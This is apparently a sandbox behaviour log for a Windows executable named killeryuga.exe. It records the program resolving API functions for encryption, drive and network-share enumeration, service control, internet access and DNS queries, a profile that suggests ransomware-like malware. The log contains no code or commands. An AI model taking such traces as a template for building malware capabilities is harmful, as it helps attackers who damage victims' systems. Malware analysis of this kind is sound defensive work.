Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
System Get Info type = Hardware Information True 249
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
System Get Info type = Operating System True 1
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Module Load module_name = MPR.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Module Load module_name = WINMM.dll, base_address = 0x75090000 True 1
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750926e0 True 1
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x750f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7502436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74e9c544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 15117810092 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
